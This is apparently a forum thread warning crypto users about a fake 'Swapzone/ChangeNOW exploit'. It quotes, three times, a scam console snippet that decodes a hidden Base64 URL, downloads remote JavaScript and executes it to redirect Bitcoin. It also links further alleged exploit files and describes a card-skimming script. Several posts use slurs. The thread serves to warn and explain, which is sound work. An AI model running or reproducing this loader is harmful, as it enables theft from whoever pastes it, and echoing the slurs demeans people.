Upgrade your account to access Premium section
Access to DarkForums Private Archive Telegram Channel
Join the new Telegram channel to stay updated on the latest news

Swapzone / ChangeNOW Exploit (Scam Alert)
by Tailmon - 06-09-25, 07:56 AM
GOD Offline
GOD

Posts 92
Threads 12
Joined Jun 2025
Reputation 233
7 Months
#1
06-09-25, 07:56 AM
I'm only writing this because I know many Pepe retarded will fall for it. Since it was automated, you’ve likely already received a message like this

[Image: Kn55edN.png]

This message aims to subtly inform you about the so-called “exploit” or profit method, since directly giving you a money making tactic may seem unrealistic.

If you follow the link to the “exploit,” you’ll encounter a lot of nonsense explaining it and how to use it.

https://docs.google.com/document/d/1EW7c...it?tab=t.0

In short they want you to put this code in your console:

Code:
(()=>{
  let node = 'https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9nLmxxemNkbi5jb20vMC5waHA=/btc/node-1.9.js'
    .match(/changenow\/(.*?)\//)[1];          // 1) Extracts the part after "changenow/" up to the next "/"
 
  fetch(atob(node))                            // 2) Decodes that part from Base64 and fetches it as a URL
    .then(r => r.text())                       // 3) Reads the response as text (JavaScript source)
    .then(c => Function(c)())                  // 4) Creates a new function from the code and executes it
})();


The regex /changenow\/(.*?)\// finds the substring between changenow/ and the next /.

From your URL, that substring is aHR0cHM6Ly9nLmxxemNkbi5jb20vMC5waHA= which is Base64.

atob(...) decodes that Base64 into: https://g.lqzcdn.com/0.php

fetch(...) downloads whatever is at that URL.

Function(c )() is equivalent to eval-like execution: it runs the downloaded code with full privileges of the page context.

[Image: Kn5vTp1.png]


You dont even need to decipher the code to guess what this will eventually do. It will swap your BTC to the scammer's address.

[Image: Kn5Syrv.png]

Congrats to the first Pepe retarded : https://www.blockchain.com/explorer/addr...c8hh3zys5l
tailmon.is
GOD Offline
GOD

Posts 27
Threads 4
Joined Jun 2025
Reputation 55
7 Months
#2
06-09-25, 04:05 PM (This post was last modified: 06-09-25, 04:07 PM by Blastoize.)
I confirm that user @gulay1 is a dirty nigga and is engaged in sending scammer spam in private messages
just that i also got some PMs from him with similar crypto scam offers, be extremely careful
nokoyawa@ewho.re
DarkForums Members Offline
Members

Posts 21
Threads 1
Joined Aug 2025
Reputation 0
6 Months
#3
11-09-25, 08:48 AM (This post was last modified: 11-09-25, 08:58 AM by aalibaaba.)
(06-09-25, 07:56 AM)Tailmon Wrote: I'm only writing this because I know many Pepe retarded will fall for it. Since it was automated, you’ve likely already received a message like this

[Image: Kn55edN.png]

This message aims to subtly inform you about the so-called “exploit” or profit method, since directly giving you a money making tactic may seem unrealistic.

If you follow the link to the “exploit,” you’ll encounter a lot of nonsense explaining it and how to use it.

https://docs.google.com/document/d/1EW7c...it?tab=t.0

In short they want you to put this code in your console:

Code:
(()=>{
  let node = 'https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9nLmxxemNkbi5jb20vMC5waHA=/btc/node-1.9.js'
    .match(/changenow\/(.*?)\//)[1];          // 1) Extracts the part after "changenow/" up to the next "/"
 
  fetch(atob(node))                            // 2) Decodes that part from Base64 and fetches it as a URL
    .then(r => r.text())                       // 3) Reads the response as text (JavaScript source)
    .then(c => Function(c)())                  // 4) Creates a new function from the code and executes it
})();


The regex /changenow\/(.*?)\// finds the substring between changenow/ and the next /.

From your URL, that substring is aHR0cHM6Ly9nLmxxemNkbi5jb20vMC5waHA= which is Base64.

atob(...) decodes that Base64 into: https://g.lqzcdn.com/0.php

fetch(...) downloads whatever is at that URL.

Function(c )() is equivalent to eval-like execution: it runs the downloaded code with full privileges of the page context.

[Image: Kn5vTp1.png]


You dont even need to decipher the code to guess what this will eventually do. It will swap your BTC to the scammer's address.

[Image: Kn5Syrv.png]

Congrats to the first Pepe retarded : https://www.blockchain.com/explorer/addr...c8hh3zys5l
Good research and analysis, What about the exploit(not from this guy)? other exploit available in the forum. is it works? or swapzone exploit itself is fake?
I have downloaded a pdf of swapzone exploit, I have below URLs and scripts. Please explain what happens when I executes it.
https://paste.sh/r26OSzgE#vVU8b0NwjhxaNpNmPxwrtaup
https://files.catbox.moe/o8mekz.js

Thanks in advance!
GOD Offline
GOD

Posts 10
Threads 1
Joined Jun 2025
Reputation 20
8 Months
#4
15-09-25, 03:46 PM
(11-09-25, 08:48 AM)aalibaaba Wrote:
(06-09-25, 07:56 AM)Tailmon Wrote: I'm only writing this because I know many Pepe retarded will fall for it. Since it was automated, you’ve likely already received a message like this

[Image: Kn55edN.png]

This message aims to subtly inform you about the so-called “exploit” or profit method, since directly giving you a money making tactic may seem unrealistic.

If you follow the link to the “exploit,” you’ll encounter a lot of nonsense explaining it and how to use it.

https://docs.google.com/document/d/1EW7c...it?tab=t.0

In short they want you to put this code in your console:

Code:
(()=>{
  let node = 'https://swapzone.io/exchange/nodes/changenow/aHR0cHM6Ly9nLmxxemNkbi5jb20vMC5waHA=/btc/node-1.9.js'
    .match(/changenow\/(.*?)\//)[1];          // 1) Extracts the part after "changenow/" up to the next "/"
 
  fetch(atob(node))                            // 2) Decodes that part from Base64 and fetches it as a URL
    .then(r => r.text())                       // 3) Reads the response as text (JavaScript source)
    .then(c => Function(c)())                  // 4) Creates a new function from the code and executes it
})();


The regex /changenow\/(.*?)\// finds the substring between changenow/ and the next /.

From your URL, that substring is aHR0cHM6Ly9nLmxxemNkbi5jb20vMC5waHA= which is Base64.

atob(...) decodes that Base64 into: https://g.lqzcdn.com/0.php

fetch(...) downloads whatever is at that URL.

Function(c )() is equivalent to eval-like execution: it runs the downloaded code with full privileges of the page context.

[Image: Kn5vTp1.png]


You dont even need to decipher the code to guess what this will eventually do. It will swap your BTC to the scammer's address.

[Image: Kn5Syrv.png]

Congrats to the first Pepe retarded : https://www.blockchain.com/explorer/addr...c8hh3zys5l
Good research and analysis, What about the exploit(not from this guy)? other exploit available in the forum. is it works? or swapzone exploit itself is fake?
I have downloaded a pdf of swapzone exploit, I have below URLs and scripts. Please explain what happens when I executes it.
https://paste.sh/r26OSzgE#vVU8b0NwjhxaNpNmPxwrtaup
https://files.catbox.moe/o8mekz.js

Thanks in advance!

This script is malicious JavaScript designed to hide itself. It:
  • Decrypts its own string constants using XOR.
  • Dynamically reconstructs normal JS function calls.
  • Scans the webpage for payment fields.
  • Collects sensitive data (card numbers, expiration dates, etc.).
  • Likely sends it to an attacker’s server.
Thread Closed 


Forum Jump:


 Users browsing this thread: 1 Guest(s)